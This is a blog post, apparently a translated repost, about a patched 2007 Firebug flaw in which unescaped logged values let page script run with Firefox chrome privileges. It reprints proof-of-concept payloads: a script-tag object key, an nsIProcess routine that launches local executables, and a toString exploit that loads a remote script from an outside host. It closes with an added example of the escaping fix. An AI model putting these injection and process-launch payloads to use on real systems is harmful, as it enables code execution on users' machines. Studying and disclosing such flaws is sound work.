Firebug Goes Evil (a security hole in Firebug before 1.0.3)

Author: David | [When reposting, please credit the original source and author with a hyperlink and include this notice]
URL:

Firebug is an excellent JavaScript debugging tool, or more precisely a web page debugging tool; I can no longer work without it.
But things usually cut both ways. Firefox is an excellent browser precisely because of its flexible, rich extensions and its own security, yet those extensions bring security risks of their own, because the people who write extensions generally do not spend much effort on security. Firebug is a case in point.
Browsing SWiK today I happened to see a headline: Firebug Goes Evil

Attackers can call console.log a few times to spawn any file they want or even silently install browser extensions, not to mention that they will be able to read and write the file system too. The possibilities for evilness are endless.

The author says:
Attackers can spawn any file they want by calling console.log a few times, or even install browser extensions, and may well be able to read and write the file system too. The author also gives a demo script; unfortunately my Firebug was updated to 1.0.5 yesterday, and this hole is already patched there.
console.log({'<script>alert("bing!")</script>':'exploit'})

There is also a more complex snippet that supposedly launches a local executable. It is the payload an attacker would want to run once they have code executing in Firebug's chrome (privileged) context, since XPCOM components such as nsILocalFile and nsIProcess are not reachable from ordinary page script:


// Launch the executable at path f with any extra arguments passed to runFile.
// Requires chrome privileges: Components.classes is unavailable to web content.
function runFile(f) {
    // Wrap the path in an nsILocalFile object
    var file = Components.classes["@mozilla.org/file/local;1"]
        .createInstance(Components.interfaces.nsILocalFile);
    file.initWithPath(f);
    // Create a process object bound to that file
    var process = Components.classes["@mozilla.org/process/util;1"]
        .createInstance(Components.interfaces.nsIProcess);
    process.init(file);
    // Remaining arguments become the command line of the new process
    var argv = Array.prototype.slice.call(arguments, 1);
    // run(blocking, args, count): wait for the process to exit
    process.run(true, argv, argv.length);
}
From the comments on that post I found a related article: http://larholm.com/2007/04/06/more-0day-in-firebug/ . Its author, larholm, had earlier published a similar article: http://larholm.com/2007/04/06/0day-vulnerability-in-firebug/ , which analyses the root cause of the Firebug vulnerability in detail and gives this proof of concept:
<script type="text/javascript">
// A function that returns a specially formatted string
function vulnstring(){
    return 'function <b style="font-size:80px">foo(<script src="http://larholm.com/vuln/firebuginclude.js"></'+'script>) { }';
}
// The function object to log with Firebug
var a = function(){};
// Overwrite the default toString method
a.toString = vulnstring;

// Attempt to trigger the vulnerability if Firebug is installed and has console logging enabled
if(typeof console!="undefined" && typeof console.log=="function")
console.log(a);
</script>



When Firebug logs the function it calls its toString() and inserts the result into its own panel as HTML, so the forged signature pulls in a script from the author's server (a harmless demo page in this case) that runs in Firebug's chrome context and pops up the message: "yay I was injected in chrome://firebug/content/panel.html"

Firebug's author replied at the end of the article:

I have fixed this issue and released 1.04.

As you suggested, I now escape all text before inserting it into HTML, rather than leaving it up to the caller. I’ve also added support for disabling file: urls.

I hope there aren’t any more vulnerabilities to be found, but if there are, please give me a day to patch it before you publish. I do appreciate you taking the time to make Firebug more secure, but it’s better for everyone to have the patch surface before the exploit.

It is a good thing that Firefox has an automatic update system, so every Firebug user should be secured within a few days.
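The bug and the fix described above, as an added example that is not from the original post, from larholm, or from Firebug's source: a minimal model of a console panel that concatenates logged values into HTML the unsafe way (the value's own toString() output and object keys land in the markup unescaped), beside the escaped version the Firebug author describes. It runs in Node without a DOM; the `logRow` markup, the function names and the `demo()` helper are assumptions made for illustration.

```javascript
// Model of the pre-1.04 behaviour: caller-supplied text goes straight into the markup.
// A logged function is rendered through toString(), so the attacker controls the HTML.
function renderLogRowUnsafe(value) {
  if (typeof value === "object" && value !== null) {
    // Object keys are rendered verbatim too (the console.log({'<script>...': 'exploit'}) case).
    const props = Object.keys(value).map((k) => `${k}: ${String(value[k])}`).join(", ");
    return `<div class="logRow">{${props}}</div>`;
  }
  return `<div class="logRow">${String(value)}</div>`;
}

// Escape the characters that matter in HTML text and attribute contexts.
function escapeHTML(text) {
  return String(text)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Model of the fixed behaviour: escape every piece of caller-supplied text before it is
// concatenated into the panel's HTML, instead of leaving that to the caller.
function renderLogRowSafe(value) {
  if (typeof value === "object" && value !== null) {
    const props = Object.keys(value)
      .map((k) => `${escapeHTML(k)}: ${escapeHTML(String(value[k]))}`)
      .join(", ");
    return `<div class="logRow">{${props}}</div>`;
  }
  return `<div class="logRow">${escapeHTML(value)}</div>`;
}

// Constructed inputs mirroring the two proofs of concept quoted in the post.
const keyPayload = { '<script>alert("bing!")</script>': "exploit" };
const fn = function () {};
fn.toString = () =>
  'function <b style="font-size:80px">foo(<script src="http://larholm.com/vuln/firebuginclude.js"></' +
  "script>) { }";

// True if the rendered markup still contains a live <script> tag.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Hypothetical helper: renders both payloads both ways and reports whether a tag survived.
function demo() {
  return {
    unsafeKey: containsScriptTag(renderLogRowUnsafe(keyPayload)), // true: tag survives
    unsafeFn: containsScriptTag(renderLogRowUnsafe(fn)),          // true
    safeKey: containsScriptTag(renderLogRowSafe(keyPayload)),     // false
    safeFn: containsScriptTag(renderLogRowSafe(fn)),              // false
  };
}

console.log(demo());
```

The point of the safe variant is where the escaping happens: inside the renderer, on every string it receives, regardless of who called console.log or what toString() returns. Escaping at the call site (or trusting the logged value to be well behaved) is exactly what the attacker's overridden toString() defeats.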

